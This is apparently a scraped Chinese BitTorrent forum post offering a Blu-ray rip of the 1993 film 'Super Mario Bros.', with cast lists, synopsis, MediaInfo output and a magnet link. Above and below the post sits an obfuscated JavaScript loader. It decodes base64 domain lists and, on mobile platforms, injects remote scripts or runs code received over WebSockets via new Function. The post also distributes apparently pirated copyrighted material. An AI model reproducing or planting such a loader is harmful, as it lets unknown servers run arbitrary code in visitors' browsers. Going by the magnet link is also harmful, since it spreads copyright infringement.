超级马里奥兄弟[中文字幕].Super.Mario.Bros.1993.1080p.BluRay.x265.10bit.DTS 8.96GB

版主小s 1月前 463

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 超级马里奥兄弟 / 超级马力兄弟 / 超级玛利兄弟

◎片 名 Super Mario Bros.

◎年 代 1993

◎产 地 英国 / 美国

◎类 别 喜剧 / 动作 / 科幻 / 惊悚 / 家庭 / 奇幻 / 冒险

◎语 言 英语

◎上映日期 1993-05-28

◎IMDb链接 https://www.imdb.com/title/tt0108255/

◎豆瓣评分 5.2/10 (568人评价)

◎豆瓣链接 https://movie.douban.com/subject/1305484/

◎片 长 104 分钟

◎导 演 安娜贝尔·杨科尔 Annabel Jankel (id:1023204)

迪安·塞姆勒 Dean Semler (id:1276583)

罗兰·约菲 Roland Joffé (id:1040830)

◎编 剧 艾德·索罗门 Ed Solomon (id:1050173)

特里·伦特 Terry Runte (id:1028910)

◎演 员 鲍勃·霍斯金斯 Bob Hoskins (id:1041156)

约翰·雷吉扎莫 John Leguizamo (id:1010561)

丹尼斯·霍珀 Dennis Hopper (id:1044720)

Thomas Merdis Thomas Merdis (id:1115546)

卡琳·穆尔 Carlene Moore (id:1292400)

萨曼莎·玛西丝 Samantha Mathis (id:1048132)

安德莉亚·鲍威尔 Andrea Powell (id:1056140)

费奥纳·肖 Fiona Shaw (id:1009364)

达娜·卡明斯基 Dana Kaminski (id:1384156)

理查德·埃德森 Richard Edson (id:1343880)

宫本茂 Shigeru Miyamoto (id:1116486)

马克·杰弗里·米勒 Mark Jeffrey Miller (id:1056166)

兰斯·亨利克森 Lance Henriksen (id:1048140)

Michael Lynch Michael Lynch (id:1043835)

弗兰克·维尔克 Frank Welker (id:1031825)

Mojo Nixon Mojo Nixon (id:1137144)

吉亚尼·罗素 Gianni Russo (id:1140760)

弗朗西斯卡·P·罗伯茨 Francesca P. Roberts (id:1141289)

Robert D. Raiford Robert D. Raiford (id:1144541)

Melanie Salvatore Melanie Salvatore (id:1148024)

Joe West Joe West (id:1162999)

凯文·韦斯特 Kevin West (id:1165462)

Ronnie Jay Leipold Ronnie Jay Leipold (id:1210215)

唐·雷克 Don Lake (id:1036879)

费舍·史蒂芬斯 Fisher Stevens (id:1036474)

丹·卡斯泰兰尼塔 Dan Castellaneta (id:1041148)

罗兰·约菲 Roland Joffé (id:1040830)

弗雷德·C·卡鲁索 Fred C. Caruso (id:1280211)

亚伦·史维斯查 Alan Silvestri (id:1002819)

迪安·塞姆勒 Dean Semler (id:1276583)

马克·戈德布拉特 Mark Goldblatt (id:1285044)

马里·芬恩 Mali Finn (id:1080809)

大卫·L·斯奈德 David L. Snyder (id:1050849)

贝丝·A·鲁比诺 Beth A. Rubino (id:1296281)

Walter P. Martishius Walter P. Martishius (id:1046409)

Joseph A. Porro Joseph A. Porro (id:1294749)

Katherine Rees Katherine Rees (id:1295382)

Jeff Goodwin Jeff Goodwin (id:1099950)

R. Christopher Biggs R. Christopher Biggs (id:1062839)

Adam Brandy Adam Brandy (id:1067710)

杰克·加伯 Jake Garber (id:1098012)

Rob Burman Rob Burman (id:1279662)

Vincent J. Guastini Vincent J. Guastini (id:1101053)

大卫·L·斯奈德 David L. Snyder (id:1050849)

迪安·塞姆勒 Dean Semler (id:1276583)

彼得·韦伯 Peter Webb (id:1300555)

Robert Scifo Robert Scifo (id:1297060)

Ed Blakely Ed Blakely (id:1021816)

希娜·达加尔 Sheena Duggal (id:1008579)

布莱恩·詹宁斯 Brian Jennings (id:1024219)

亚当·霍华德 Adam Howard (id:1042283)

Chuck Shuman Chuck Shuman (id:1048780)

Thomas Valentine Thomas Valentine (id:1299794)

Kevin Bjorke Kevin Bjorke (id:1066922)

◎标 签 科幻 / 美国 / 喜剧 / 游戏改编 / 1993 / 美国电影 / 电影 / 童心回放

◎简 介

传说在地球被一颗陨石撞击之后,另一半的星球上的生灵在日益毁坏的生态环境下,面临越来越痛苦的境遇。斯凯普林管道公司在挖掘地下时,将两个世界打通。马里奥和鲁基兄弟本来是管道工,因为戴西被抓,他们一同进入岩层,来到由库帕控制的另一个世界。库帕运用他的机器,可以将生物随意进化或退化,而可以统一两个世界的正是戴西,她手中的陨石碎片成了大家争抢的目标。兄弟二人发挥了他们的所长,帮助戴西使父亲复原,并稳定了混乱的局势。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 198817254998853456587924191001283762375 (0x9592CF7C07FF1B1412CD3A26746D98C7)

  4. Complete name : [email protected]OM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.96 GiB

  8. Duration : 1 h 44 min

  9. Overall bit rate : 12.2 Mb/s

  10. Encoded date : UTC 2021-10-19 09:06:16

  11. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 44 min

  20. Bit rate : 10.6 Mb/s

  21. Width : 1 920 pixels

  22. Height : 1 036 pixels

  23. Display aspect ratio : 1.85:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.223

  30. Stream size : 7.80 GiB (87%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=20.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.70 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1036 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Default : Yes

  34. Forced : No


  35. Audio

  36. ID : 2

  37. ID in the original source medium : 4353 (0x1101)

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 44 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 1.10 GiB (12%)

  51. Language : English

  52. Default : Yes

  53. Forced : No

  54. Original source medium : Blu-ray


  55. Text #1

  56. ID : 3

  57. ID in the original source medium : 4609 (0x1201)

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 1 h 43 min

  63. Bit rate : 46.3 kb/s

  64. Count of elements : 1751

  65. Stream size : 34.3 MiB (0%)

  66. Title : chs&eng

  67. Language : Chinese

  68. Default : Yes

  69. Forced : No

  70. Original source medium : Blu-ray


  71. Text #2

  72. ID : 4

  73. ID in the original source medium : 4610 (0x1202)

  74. Format : PGS

  75. Muxing mode : zlib

  76. Codec ID : S_HDMV/PGS

  77. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  78. Duration : 1 h 43 min

  79. Bit rate : 46.6 kb/s

  80. Count of elements : 1751

  81. Stream size : 34.5 MiB (0%)

  82. Title : cht&eng

  83. Language : Chinese

  84. Default : No

  85. Forced : No

  86. Original source medium : Blu-ray


  87. Text #3

  88. ID : 5

  89. ID in the original source medium : 4611 (0x1203)

  90. Format : PGS

  91. Muxing mode : zlib

  92. Codec ID : S_HDMV/PGS

  93. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  94. Duration : 1 h 43 min

  95. Bit rate : 24.5 kb/s

  96. Count of elements : 1751

  97. Stream size : 18.1 MiB (0%)

  98. Title : chs

  99. Language : Chinese

  100. Default : No

  101. Forced : No

  102. Original source medium : Blu-ray


  103. Text #4

  104. ID : 6

  105. ID in the original source medium : 4612 (0x1204)

  106. Format : PGS

  107. Muxing mode : zlib

  108. Codec ID : S_HDMV/PGS

  109. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  110. Duration : 1 h 43 min

  111. Bit rate : 24.8 kb/s

  112. Count of elements : 1751

  113. Stream size : 18.3 MiB (0%)

  114. Title : cht

  115. Language : Chinese

  116. Default : No

  117. Forced : No

  118. Original source medium : Blu-ray


  119. Text #5

  120. ID : 7

  121. ID in the original source medium : 4608 (0x1200)

  122. Format : PGS

  123. Muxing mode : zlib

  124. Codec ID : S_HDMV/PGS

  125. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  126. Duration : 1 h 43 min

  127. Bit rate : 43.9 kb/s

  128. Count of elements : 2946

  129. Stream size : 32.6 MiB (0%)

  130. Title : eng

  131. Language : English

  132. Default : No

  133. Forced : No

  134. Original source medium : Blu-ray


  135. Menu

  136. 00:00:00.000 : en:Chapter 01

  137. 00:07:02.083 : en:Chapter 02

  138. 00:13:26.000 : en:Chapter 03

  139. 00:17:38.916 : en:Chapter 04

  140. 00:23:04.416 : en:Chapter 05

  141. 00:28:05.333 : en:Chapter 06

  142. 00:36:10.208 : en:Chapter 07

  143. 00:45:44.875 : en:Chapter 08

  144. 00:50:30.291 : en:Chapter 09

  145. 00:57:25.541 : en:Chapter 10

  146. 01:05:15.166 : en:Chapter 11

  147. 01:11:38.791 : en:Chapter 12

  148. 01:19:57.625 : en:Chapter 13

  149. 01:24:14.541 : en:Chapter 14

  150. 01:29:50.333 : en:Chapter 15

  151. 01:38:23.250 : en:Chapter 16

  152. 01:39:25.375 : en:Chapter 17

  153. 01:44:41.916 : en:Chapter 18




复制代码


TAGS 动作 奇幻 冒险 惊悚 科幻 喜剧 家庭

磁力链:
  • magnet:?xt=urn:btih:E54237A492B678E84C6C1A573566630C3F1FADDF

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (1)
  • Leon612 1月前
    2
    啥也不说了,感谢楼主分享哇!

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};